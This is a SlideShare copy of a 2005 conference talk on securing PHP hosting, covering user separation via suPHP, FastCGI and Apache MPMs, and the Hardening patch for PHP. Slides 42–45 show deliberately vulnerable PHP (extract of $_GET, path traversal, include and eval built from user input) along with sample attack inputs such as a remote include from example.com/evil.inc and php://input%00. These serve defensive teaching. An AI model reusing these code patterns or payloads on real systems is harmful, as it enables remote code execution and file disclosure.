SlideShare ist ein Scribd-Unternehmen logo

Secure PHP environment

SpeedPartner GmbH
SpeedPartner GmbH

Date: 2005-11-08 Location: Frankfurt, Germany Event: International PHP Conference

Technologie
1 von 55
Downloaden Sie, um offline zu lesen
Secure PHP environment Stefan Neufeind SpeedPartner GmbH
2 About me  Stefan Neufeind  From Neuss (near Düsseldorf, Germany)  Working for SpeedPartner GmbH (consulting, development, administration)  PEAR-developer  Loves PHP / FOSS :-)
3 Agenda  Basic steps, Common beliefs  Server environment  Separating users  CGI  FastCGI  MPM („inside“ Apache)  Delivering static files  Hardening PHP  Links
4 Basic steps  Physical security  Direct access to server / data possible?  Network security  Connected to Internet?  Firewalled?  Security monitored?
5 Basic steps  Application security  Base system  Webserver  PHP  Webapplications  Other applications on same server  Any „unneeded“ services available?
6 Basic steps  Application security (continued)  Patches applied  Configuration „carefully“ done  Users / applications on the system  Separation of rights / services
7 Basic steps Your personal „mix“ of: Performance Resources Security Ease of use
8 Basic steps  Security-lifecycle  Requirements: Identify needs / use-cases  Design: Define rules  Implementation: Apply rules  Verification: Monitor rules  Continuing process of improvement  Review critically
9 Common beliefs  “A standard installation is secure.”  Usually not (unless it does not expose any services etc.)  “I have only secure applications installed.”  How can you be sure?  Did you re-check this assumption lately? (security warnings, patches, audits, ...)
10 Common beliefs  “My users know what they are doing.”  What are they doing?  Do they know and follow the rules?  “None of the users would try to break anything.”  Always somebody will try out something.  If smallest „holes“ exist, they might be found.
11 Server environment  Run minimal services  Apache, MySQL, ...  Expose only needed services to the net  Apache, ...  Firewalling  Also host-based  Rate-limiting, limit outgoing connections, ...  Restrictive file-/dir-permissions
12 Server environment  PHP:  Secure configuration (no register_globals, ...)  Separate user-rights of scripts  Use safety-checks:  In application-code  Inside PHP (Hardening patch for PHP → later)
13 Separating users Concepts:  PHP with safe_mode  Too restrictive for some scripts  Only “fake” separation of users  Does not work for other CGIs  Running one instance for each user  User-switching where needed  User-switching where possible
14 User-switching via CGI Pros:  „Easy” to use  Stable  (Quite) secure Cons:  Slow  PHP also as CGI  No switching for static content
15 User-switching via CGI Solutions:  mod_suexec (from Apache)  suPHP  mod_suid  only for Apache 1.x, old  mod_cgiwrap  only for Apache 1.x, officially discontinued
16 User-switching via CGI suPHP:  Runs php-scripts without #! in first line  Allows running php3/4/5 in parallel  Special enviroment-setup for PHP  Also runs normal CGIs
17 User-switching via CGI suPHP – Apache-configuration: AddHandler php5-script .php5 <Directory /> AddHandler x-httpd-php .php suPHP_AddHandler x-httpd-php # optional: suPHP_UserGroup username groupname </Directory> suPHP_Engine on
18 User-switching via CGI suPHP – excerpts from /etc/suphp.conf: webserver_user=apache ;Path all scripts have to be in docroot=/var/www ;Check wheter script is within DOCUMENT_ROOT check_vhost_docroot=true ;Umask to set, specify in octal notation umask=0077
19 User-switching via CGI suPHP – excerpts from /etc/suphp.conf: ; Security options allow_file_group_writeable=false allow_file_others_writeable=false allow_directory_group_writeable=false allow_directory_others_writeable=false ; Minimum UID/GID min_uid=48 min_gid=48
20 User-switching via CGI suPHP – excerpts from /etc/suphp.conf: [handlers] ;Handler for php-scripts x-httpd-php=php:/usr/bin/php-cgi ;Handler for CGI-scripts x-suphp-cgi=execute:!self
21 User-switching via FastCGI Pros:  Faster than CGI  Stable  Platform- independent  Runnable remote from webserver Cons:  Fixed number of instances per user  Only for FastCGI- enabled programs (e.g. PHP)  No switching for static content
22 User-switching via FastCGI  Instances of FastCGI-program running without being closed  Saves fork() etc. on every request  Communication to webserver using domain-sockets or TCP/IP instead of pipes  Allows running remote from webserver
23 User-switching via FastCGI Apache-configuration, global:  Instead of „-socket” use “-host” for remote connections via TCP/IP  Colon in socket-name due to PHP-bug <IfModule mod_fastcgi.c> FastCgiExternalServer /var/run/php- fastcgi/fcgi-bin/demouser/php4 -socket /var/run/php-fastcgi/sockets/demouser:php4 </IfModule>
24 User-switching via FastCGI Apache-configuration, virtualhost/directory:  Last argument to “ScriptAlias” is identifier  Identifier used for mapping internally; (should exist in filesystem for compatibility with Apache 1.x/2.x) AddHandler php-cgi .php Action php-cgi /cgi-bin/php4 ScriptAlias /cgi-bin/php4 /var/run/php- fastcgi/fcgi-bin/demouser/php4
25 User-switching via FastCGI Configurations via environment:  PHP_FCGI_CHILDREN number of PHP children to spawn  PHP_FCGI_MAX_REQUESTS number of requests served by a single php-process until it is restarted
26 User-switching inside Apache Pros:  Faster than CGI  Switches Apache- instance completely  Also static content user-switched Cons:  Not recommended for production  No official (working) Apache-module  Module must match Apache-version
27 User-switching inside Apache Solutions via MPM for Apache 2.x: (MPM = Multi-Processing Module)  perchild (from Apache)  Official statement: “module is not functional” “Do not use unless [...] willing to help fix it.”  MetuxMPM  Chaotic development; not up2date  peruser (from Telena)
28 User-switching inside Apache Roots of implementations: peruser (bit more advanced) MetuxMPM (not for current Apache) perchild (not functional) based on based on
29 User-switching inside Apache peruser MPM:  Works for Apache 2.0.52, newer patches under development  Used in production, but recommended „If it breaks, you get to keep both pieces :)”  Problems with mod_ssl  Use proxy such as “Pound” in front  Disable Keepalive to avoid problems
30 User-switching inside Apache Apache-configuration, global: <IfModule peruser.c> ServerLimit 256 MaxClients 256 MinSpareProcessors 2 MaxProcessors 10 MaxRequestsPerChild 1000 # kill idle procs after XX seconds ExpireTimeout 1800 Multiplexer nobody nobody
31 User-switching inside Apache Apache-configuration, global:  Use one “Processor”-directive for each user/group/chroot-combination needed Processor user group /home/user # chroot dir is optional: # Processor user group </IfModule> # KeepAlive *MUST* be off KeepAlive Off
32 User-switching inside Apache Apache-configuration, virtualhost/directory: <IfModule peruser.c> # must match a defined Processor ServerEnvironment user group /home/user # optional MinSpareProcessors 4 MaxProcessors 20 </IfModule>
33 Delivering static files  Separating users desired  No access to foreign files  Not even for static files, not even read  Works fine with fully user-switched Apache (MPM)  But how with user-switched CGI/FastCGI?
34 Delivering static files  Possible solution:  Apache in all user-groups  Just read-access for Apache  Possiblity to prevent access for Apache to specific files (configs, logs, PHP, ...)  Linux 2.4: 32 groups per user  Linux 2.6: 65535 groups per user
35 Delivering static files  Files for testing  Excerpt from /etc/group: -rw-r----- user1000 group1000 file1000.txt -rw-r----- user1001 group1001 file1001.txt -rw-r----- user1002 group1002 file1002.txt -rw------- user1002 group1002 script1002.txt group1000:x:1000:apache group1001:x:1001:apache group1002:x:1002:apache
36 Hardening PHP  Former “Hardened-PHP”, now “Hardening patch for PHP”  Adds extra checks, limitations and filters  Backports some security-improvements
37 Hardening PHP New checks/features for:  Engine  Runtime  Filtering  Logging
38 Hardening PHP Engine features:  Zend Memory Manager: Canary and safe unlink protection  Zend Linked List: Canary protection  Zend HashTables: Destructor canary protection  Protection of the PHP core and extensions against format string vulnerabilities
39 Hardening PHP Runtime features:  Execution depth limit  Separated function whitelists and blacklists in normal and in eval() mode  Failing SQL queries within the MySQL/MySQLi/fbsql/pgsql/sqlite extensions can be logged  Script can abort after failed SQL Query
40 Hardening PHP Runtime features (continued):  Multiple HTTP headers in one header() call forbidden by default  Include filename limits  Overlong filename filter  URL filter (optional whitelist/blacklist)  Uploaded files filter  Truncated filename filter
41 Hardening PHP Runtime features (continued):  Superglobals protected against extract()/import_request_vars()  memory_limit cannot be raised above configured limit  realpath() replacement function  Prevents problems on some platforms (Linux, BSD, ...)
42 Hardening PHP Runtime – superglobals (example): Without superglobal-protection $_SERVER might have been overwritten. <?php // ... extract($_GET); echo $_SERVER['DOCUMENT_ROOT']; //... ?>
43 Hardening PHP Runtime – path checking (example): Choose $nr = "15.txt/../../def" Actually reading /def.txt Hardened PHP would find out that /abc/artikel_15.txt is no directory <?php // ... $a=file_get_contents("/abc/artikel_$nr.txt"); echo $a; ?>
44 Hardening PHP Runtime configurations (php.ini, excerpt):  hphp.executor.include.whitelist / blacklist  Beginning of URL schemes to allow includes from (also php://stdin)  hphp.executor.func.whitelist / blacklist  hphp.executor.eval.whitelist / blacklist
45 Hardening PHP Runtime – include and eval (example):  Arbitrary (remote?) includes  action=http://example.com/evil.inc  action=php://input%00  Function-calls via eval <?php include $_GET['module'].'-module.php'; eval('module_'.$_GET['module'].'_init()'); ?>
46 Hardening PHP Filtering features:  GET, POST, COOKIE variables with following names not registered:  GLOBALS, _COOKIE, _ENV, _FILES, _GET, _POST  _REQUEST, _SERVER, _SESSION, HTTP_COOKIE_VARS  HTTP_ENV_VARS, HTTP_GET_VARS, HTTP_POST_FILES,  HTTP_POST_VARS, HTTP_RAW_POST_DATA,  HTTP_SERVER_VARS, HTTP_SESSION_VARS
47 Hardening PHP Filtering features (continued):  Limits can be enforced on COOKIE, GET or POST variables or all REQUEST vars  Number of variables  Maximum length of variable name  Maximum length of array indices  Maximum length of variable value  Maximum depth of array
48 Hardening PHP Filtering features (continued):  Allow/disallow %00 in user-input  Limit for number of uploadable files  Hook for variable name checks before file upload  Uploaded ELF files can be filtered  External verification script for uploaded files
49 Hardening PHP Filtering features (examples):  %00 (binary null) used to terminate strings Can prevent some functions to check beyond this artificial “end of string”  Check filenames before passed to script  Allow virus-scans, rejecting certain files, ...
50 Hardening PHP Logging features:  Logging of ALERT classes configurable by class  Syslog facility and priority configurable  ALERTS loggable by SAPI error log  ALERTS loggable by external script  Attackers IP addresses can be extracted from X-Forwarded-For headers
51 Hardening PHP Pros:  „Paranoid“ checks  Can prevent unknown exploits  Additional security without touching scripts Cons:  Security vs. performance / resources  Some rules might be “too restrictive” initially  Adjust carefully where needed
52 Links  CGI-userswitching for Apache:  mod_suexec http://httpd.apache.org/docs/2.0/mod/mod_suexec.html  suphp http://www.suphp.org/  mod_suid http://www.palsenberg.com/index.php/plain/projects/  mod_cgiwrap http://mod-cgiwrap.sourceforge.net/
53 Links  MPMs for Apache:  Perchild (from Apache) http://httpd.apache.org/docs/2.0/mod/perchild.html  MetuxMPM:  Official: http://www.metux.de/mpm/  Unofficial: http://www.sannes.org/metuxmpm/  Peruser (from Telena) http://www.telana.com/peruser.php
54 Links / Thanks  FastCGI http://www.fastcgi.com/  Hardending patch for PHP http://www.hardened-php.org/  PHP Professionell (German magazine, article on hardening PHP) Thanks go to:  Hilko Bengen (FastCGI)  Stefan Esser (Hardened PHP)
55 Thank you! Up-to-date slides available at: http://talks.speedpartner.de/ Questions? neufeind (at) speedpartner.de

Empfohlen

Hacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShellHacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShell
Nikhil Mittal
 
Nginx 0.8.x + php 5.2.13 (fast cgi) setup web server
Nginx 0.8.x + php 5.2.13 (fast cgi) setup web serverNginx 0.8.x + php 5.2.13 (fast cgi) setup web server
Nginx 0.8.x + php 5.2.13 (fast cgi) setup web server
wruben
 
How to generate,collect and upload ocum logs
How to generate,collect and upload ocum logsHow to generate,collect and upload ocum logs
How to generate,collect and upload ocum logs
Ashwin Pawar
 
Running PHP on Windows Technical Overview
Running PHP on Windows Technical OverviewRunning PHP on Windows Technical Overview
Running PHP on Windows Technical Overview
Wes Yanaga
 
Automating OpenSCAP with Foreman
Automating OpenSCAP with ForemanAutomating OpenSCAP with Foreman
Automating OpenSCAP with Foreman
szadok
 
Presentation
PresentationPresentation
Presentation
PiercePreston
 
Information on PHP Handlers
Information on PHP HandlersInformation on PHP Handlers
Information on PHP Handlers
HTS Hosting
 
Prizm Installation Guide
Prizm Installation GuidePrizm Installation Guide
Prizm Installation Guide
vjvarenya
 

Empfohlen

Hacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShellHacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShell
Nikhil Mittal
 
Nginx 0.8.x + php 5.2.13 (fast cgi) setup web server
Nginx 0.8.x + php 5.2.13 (fast cgi) setup web serverNginx 0.8.x + php 5.2.13 (fast cgi) setup web server
Nginx 0.8.x + php 5.2.13 (fast cgi) setup web server
wruben
 
How to generate,collect and upload ocum logs
How to generate,collect and upload ocum logsHow to generate,collect and upload ocum logs
How to generate,collect and upload ocum logs
Ashwin Pawar
 
Running PHP on Windows Technical Overview
Running PHP on Windows Technical OverviewRunning PHP on Windows Technical Overview
Running PHP on Windows Technical Overview
Wes Yanaga
 
Automating OpenSCAP with Foreman
Automating OpenSCAP with ForemanAutomating OpenSCAP with Foreman
Automating OpenSCAP with Foreman
szadok
 
Presentation
PresentationPresentation
Presentation
PiercePreston
 
Information on PHP Handlers
Information on PHP HandlersInformation on PHP Handlers
Information on PHP Handlers
HTS Hosting
 
Prizm Installation Guide
Prizm Installation GuidePrizm Installation Guide
Prizm Installation Guide
vjvarenya
 
Securing Infrastructure with OpenScap The Automation Way !!
Securing Infrastructure with OpenScap The Automation Way !!Securing Infrastructure with OpenScap The Automation Way !!
Securing Infrastructure with OpenScap The Automation Way !!
Jaskaran Narula
 
TYPO3 6.2. What's new
TYPO3 6.2. What's newTYPO3 6.2. What's new
TYPO3 6.2. What's new
Rafal Brzeski
 
Python on exadata
Python on exadataPython on exadata
Python on exadata
Rainer Schuettengruber
 
Windows Server and Fast CGI Technologies For PHP
Windows Server and Fast CGI Technologies For PHPWindows Server and Fast CGI Technologies For PHP
Windows Server and Fast CGI Technologies For PHP
Tim Keller
 
Apache Cloudstack QA Strategy
Apache Cloudstack QA StrategyApache Cloudstack QA Strategy
Apache Cloudstack QA Strategy
Sudha R Ponnaganti
 
PVS-Studio in the Clouds: Travis CI
PVS-Studio in the Clouds: Travis CIPVS-Studio in the Clouds: Travis CI
PVS-Studio in the Clouds: Travis CI
Andrey Karpov
 
&lt;img src="../i/r_14.png" />
&lt;img src="../i/r_14.png" />&lt;img src="../i/r_14.png" />
&lt;img src="../i/r_14.png" />
tutorialsruby
 
Workshop: PowerShell for Penetration Testers
Workshop: PowerShell for Penetration TestersWorkshop: PowerShell for Penetration Testers
Workshop: PowerShell for Penetration Testers
Nikhil Mittal
 
Snort296x centos6x 2
Snort296x centos6x 2Snort296x centos6x 2
Snort296x centos6x 2
Trinh Tuan
 
Its3 Drupal
Its3 DrupalIts3 Drupal
Its3 Drupal
guest954945a
 
PowerShell for Penetration Testers
PowerShell for Penetration TestersPowerShell for Penetration Testers
PowerShell for Penetration Testers
Nikhil Mittal
 
Anthony McKeown Drupal Presentation
Anthony McKeown Drupal PresentationAnthony McKeown Drupal Presentation
Anthony McKeown Drupal Presentation
Tony McKeown
 
OpenSCAP Overview(security scanning for docker image and container)
OpenSCAP Overview(security scanning for docker image and container)OpenSCAP Overview(security scanning for docker image and container)
OpenSCAP Overview(security scanning for docker image and container)
Jooho Lee
 
Continuous intrusion: Why CI tools are an attacker’s best friends
Continuous intrusion: Why CI tools are an attacker’s best friendsContinuous intrusion: Why CI tools are an attacker’s best friends
Continuous intrusion: Why CI tools are an attacker’s best friends
Nikhil Mittal
 
Presentation1
Presentation1Presentation1
Presentation1
Ma.Danna Inigo
 
Download It
Download ItDownload It
Download It
webhostingguy
 
PHP and FastCGI Performance Optimizations
PHP and FastCGI Performance OptimizationsPHP and FastCGI Performance Optimizations
PHP and FastCGI Performance Optimizations
Alessandro Pilotti
 
Supercharging your PHP pages with mod_lsapi in CloudLinux OS
Supercharging your PHP pages with mod_lsapi in CloudLinux OSSupercharging your PHP pages with mod_lsapi in CloudLinux OS
Supercharging your PHP pages with mod_lsapi in CloudLinux OS
CloudLinux
 
Professional deployment
Professional deploymentProfessional deployment
Professional deployment
Ivelina Dimova
 
Automated User Tests with Apache Flex
Automated User Tests with Apache FlexAutomated User Tests with Apache Flex
Automated User Tests with Apache Flex
Gert Poppe
 
Lamp Zend Security
Lamp Zend SecurityLamp Zend Security
Lamp Zend Security
Ram Srivastava
 
Php Conference Brazil - Phalcon Giant Killer
Php Conference Brazil - Phalcon Giant KillerPhp Conference Brazil - Phalcon Giant Killer
Php Conference Brazil - Phalcon Giant Killer
Jackson F. de A. Mafra
 

Weitere ähnliche Inhalte

Was ist angesagt?

&lt;img src="../i/r_14.png" />
&lt;img src="../i/r_14.png" />&lt;img src="../i/r_14.png" />
&lt;img src="../i/r_14.png" />
tutorialsruby
 
Continuous intrusion: Why CI tools are an attacker’s best friends
Continuous intrusion: Why CI tools are an attacker’s best friendsContinuous intrusion: Why CI tools are an attacker’s best friends
Continuous intrusion: Why CI tools are an attacker’s best friends
Nikhil Mittal
 

Was ist angesagt? (15)

Securing Infrastructure with OpenScap The Automation Way !!
Securing Infrastructure with OpenScap The Automation Way !!Securing Infrastructure with OpenScap The Automation Way !!
Securing Infrastructure with OpenScap The Automation Way !!
 
TYPO3 6.2. What's new
TYPO3 6.2. What's newTYPO3 6.2. What's new
TYPO3 6.2. What's new
 
Python on exadata
Python on exadataPython on exadata
Python on exadata
 
Windows Server and Fast CGI Technologies For PHP
Windows Server and Fast CGI Technologies For PHPWindows Server and Fast CGI Technologies For PHP
Windows Server and Fast CGI Technologies For PHP
 
Apache Cloudstack QA Strategy
Apache Cloudstack QA StrategyApache Cloudstack QA Strategy
Apache Cloudstack QA Strategy
 
PVS-Studio in the Clouds: Travis CI
PVS-Studio in the Clouds: Travis CIPVS-Studio in the Clouds: Travis CI
PVS-Studio in the Clouds: Travis CI
 
&lt;img src="../i/r_14.png" />
&lt;img src="../i/r_14.png" />&lt;img src="../i/r_14.png" />
&lt;img src="../i/r_14.png" />
 
Workshop: PowerShell for Penetration Testers
Workshop: PowerShell for Penetration TestersWorkshop: PowerShell for Penetration Testers
Workshop: PowerShell for Penetration Testers
 
Snort296x centos6x 2
Snort296x centos6x 2Snort296x centos6x 2
Snort296x centos6x 2
 
Its3 Drupal
Its3 DrupalIts3 Drupal
Its3 Drupal
 
PowerShell for Penetration Testers
PowerShell for Penetration TestersPowerShell for Penetration Testers
PowerShell for Penetration Testers
 
Anthony McKeown Drupal Presentation
Anthony McKeown Drupal PresentationAnthony McKeown Drupal Presentation
Anthony McKeown Drupal Presentation
 
OpenSCAP Overview(security scanning for docker image and container)
OpenSCAP Overview(security scanning for docker image and container)OpenSCAP Overview(security scanning for docker image and container)
OpenSCAP Overview(security scanning for docker image and container)
 
Continuous intrusion: Why CI tools are an attacker’s best friends
Continuous intrusion: Why CI tools are an attacker’s best friendsContinuous intrusion: Why CI tools are an attacker’s best friends
Continuous intrusion: Why CI tools are an attacker’s best friends
 
Presentation1
Presentation1Presentation1
Presentation1
 

Ähnlich wie Secure PHP environment

Automated User Tests with Apache Flex
Automated User Tests with Apache FlexAutomated User Tests with Apache Flex
Automated User Tests with Apache Flex
Gert Poppe
 
Php through the eyes of a hoster phpbnl11
Php through the eyes of a hoster phpbnl11Php through the eyes of a hoster phpbnl11
Php through the eyes of a hoster phpbnl11
Combell NV
 
Apache Street Smarts Presentation (SANS 99)
Apache Street Smarts Presentation (SANS 99)Apache Street Smarts Presentation (SANS 99)
Apache Street Smarts Presentation (SANS 99)
Michael Dobe, Ph.D.
 
Feb. 9, 2010 ICACT 2010@Phoenix Park, Korea
Feb. 9, 2010 ICACT 2010@Phoenix Park, Korea Feb. 9, 2010 ICACT 2010@Phoenix Park, Korea
Feb. 9, 2010 ICACT 2010@Phoenix Park, Korea
webhostingguy
 
Process control daemon
Process control daemonProcess control daemon
Process control daemon
haish
 

Ähnlich wie Secure PHP environment (20)

Download It
Download ItDownload It
Download It
 
PHP and FastCGI Performance Optimizations
PHP and FastCGI Performance OptimizationsPHP and FastCGI Performance Optimizations
PHP and FastCGI Performance Optimizations
 
Supercharging your PHP pages with mod_lsapi in CloudLinux OS
Supercharging your PHP pages with mod_lsapi in CloudLinux OSSupercharging your PHP pages with mod_lsapi in CloudLinux OS
Supercharging your PHP pages with mod_lsapi in CloudLinux OS
 
Professional deployment
Professional deploymentProfessional deployment
Professional deployment
 
Automated User Tests with Apache Flex
Automated User Tests with Apache FlexAutomated User Tests with Apache Flex
Automated User Tests with Apache Flex
 
Lamp Zend Security
Lamp Zend SecurityLamp Zend Security
Lamp Zend Security
 
Php Conference Brazil - Phalcon Giant Killer
Php Conference Brazil - Phalcon Giant KillerPhp Conference Brazil - Phalcon Giant Killer
Php Conference Brazil - Phalcon Giant Killer
 
Automated User Tests with Apache Flex
Automated User Tests with Apache FlexAutomated User Tests with Apache Flex
Automated User Tests with Apache Flex
 
PHP {in}security
PHP {in}securityPHP {in}security
PHP {in}security
 
Php through the eyes of a hoster: PHPNW10
Php through the eyes of a hoster: PHPNW10Php through the eyes of a hoster: PHPNW10
Php through the eyes of a hoster: PHPNW10
 
Php through the eyes of a hoster confoo
Php through the eyes of a hoster confooPhp through the eyes of a hoster confoo
Php through the eyes of a hoster confoo
 
Php through the eyes of a hoster phpbnl11
Php through the eyes of a hoster phpbnl11Php through the eyes of a hoster phpbnl11
Php through the eyes of a hoster phpbnl11
 
Apache Street Smarts Presentation (SANS 99)
Apache Street Smarts Presentation (SANS 99)Apache Street Smarts Presentation (SANS 99)
Apache Street Smarts Presentation (SANS 99)
 
Plugins And Making Your Own
Plugins And Making Your OwnPlugins And Making Your Own
Plugins And Making Your Own
 
Feb. 9, 2010 ICACT 2010@Phoenix Park, Korea
Feb. 9, 2010 ICACT 2010@Phoenix Park, Korea Feb. 9, 2010 ICACT 2010@Phoenix Park, Korea
Feb. 9, 2010 ICACT 2010@Phoenix Park, Korea
 
Is your code ready for PHP 7 ?
Is your code ready for PHP 7 ?Is your code ready for PHP 7 ?
Is your code ready for PHP 7 ?
 
The why and how of moving to php 8
The why and how of moving to php 8The why and how of moving to php 8
The why and how of moving to php 8
 
Process control daemon
Process control daemonProcess control daemon
Process control daemon
 
Php myadmin
Php myadminPhp myadmin
Php myadmin
 
2008-09-09 IBM Interaction Conference, Red Hat Update for System z
2008-09-09 IBM Interaction Conference, Red Hat Update for System z2008-09-09 IBM Interaction Conference, Red Hat Update for System z
2008-09-09 IBM Interaction Conference, Red Hat Update for System z
 

Mehr von SpeedPartner GmbH

Mehr von SpeedPartner GmbH (20)

Extbase/Fluid: Kennenlernen und ausprobieren
Extbase/Fluid: Kennenlernen und ausprobierenExtbase/Fluid: Kennenlernen und ausprobieren
Extbase/Fluid: Kennenlernen und ausprobieren
 
Professional reports with SVG
Professional reports with SVGProfessional reports with SVG
Professional reports with SVG
 
XUL - The future of user-interfaces on the web
XUL - The future of user-interfaces on the webXUL - The future of user-interfaces on the web
XUL - The future of user-interfaces on the web
 
PHP-Applikationen mit PEAR
PHP-Applikationen mit PEARPHP-Applikationen mit PEAR
PHP-Applikationen mit PEAR
 
PHP-Entwicklung mit PEAR
PHP-Entwicklung mit PEARPHP-Entwicklung mit PEAR
PHP-Entwicklung mit PEAR
 
Websockets: Leichtgewichtige Verbindungen für Web-Applikationen
Websockets: Leichtgewichtige Verbindungen für Web-ApplikationenWebsockets: Leichtgewichtige Verbindungen für Web-Applikationen
Websockets: Leichtgewichtige Verbindungen für Web-Applikationen
 
Web-Performance-Optimierung mit varnish
Web-Performance-Optimierung mit varnishWeb-Performance-Optimierung mit varnish
Web-Performance-Optimierung mit varnish
 
System-Management-Trio: Zentrale Verwaltung mit facter, puppet und augeas
System-Management-Trio: Zentrale Verwaltung mit facter, puppet und augeasSystem-Management-Trio: Zentrale Verwaltung mit facter, puppet und augeas
System-Management-Trio: Zentrale Verwaltung mit facter, puppet und augeas
 
News from PEAR
News from PEARNews from PEAR
News from PEAR
 
PEAR - An introduction
PEAR - An introductionPEAR - An introduction
PEAR - An introduction
 
Suchmaschinen-Optimierung
Suchmaschinen-OptimierungSuchmaschinen-Optimierung
Suchmaschinen-Optimierung
 
.EU – eine neue Top-Level-Domain
.EU – eine neue Top-Level-Domain.EU – eine neue Top-Level-Domain
.EU – eine neue Top-Level-Domain
 
Leben und Arbeiten in einer Community
Leben und Arbeiten in einer CommunityLeben und Arbeiten in einer Community
Leben und Arbeiten in einer Community
 
System-Management-Trio: Zentrale Verwaltung mit facter, puppet und augeas
System-Management-Trio: Zentrale Verwaltung mit facter, puppet und augeasSystem-Management-Trio: Zentrale Verwaltung mit facter, puppet und augeas
System-Management-Trio: Zentrale Verwaltung mit facter, puppet und augeas
 
Sicherer Wegweiser im Internet: DNSSEC im praktischen Einsatz
Sicherer Wegweiser im Internet: DNSSEC im praktischen EinsatzSicherer Wegweiser im Internet: DNSSEC im praktischen Einsatz
Sicherer Wegweiser im Internet: DNSSEC im praktischen Einsatz
 
System-Management-Trio: Zentrale Verwaltung mit facter, puppet und augeas
System-Management-Trio: Zentrale Verwaltung mit facter, puppet und augeasSystem-Management-Trio: Zentrale Verwaltung mit facter, puppet und augeas
System-Management-Trio: Zentrale Verwaltung mit facter, puppet und augeas
 
Web-Performance-Optimierung mit varnish
Web-Performance-Optimierung mit varnishWeb-Performance-Optimierung mit varnish
Web-Performance-Optimierung mit varnish
 
System-Management-Trio: Zentrale Verwaltung mit facter, puppet und augeas
System-Management-Trio: Zentrale Verwaltung mit facter, puppet und augeasSystem-Management-Trio: Zentrale Verwaltung mit facter, puppet und augeas
System-Management-Trio: Zentrale Verwaltung mit facter, puppet und augeas
 
Sicherer Wegweiser im Internet: DNSSEC im praktischen Einsatz
Sicherer Wegweiser im Internet: DNSSEC im praktischen EinsatzSicherer Wegweiser im Internet: DNSSEC im praktischen Einsatz
Sicherer Wegweiser im Internet: DNSSEC im praktischen Einsatz
 
Deploying IPv6 - planning, common pitfalls and security-considerations
Deploying IPv6 - planning, common pitfalls and security-considerationsDeploying IPv6 - planning, common pitfalls and security-considerations
Deploying IPv6 - planning, common pitfalls and security-considerations
 

Kürzlich hochgeladen

08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
Delhi Call girls
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
sammart93
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
Earley Information Science
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
Delhi Call girls
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
Enterprise Knowledge
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
giselly40
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
Principled Technologies
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
Safe Software
 

Kürzlich hochgeladen (20)

08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
08448380779 Call Girls In Friends Colony Women Seeking Men
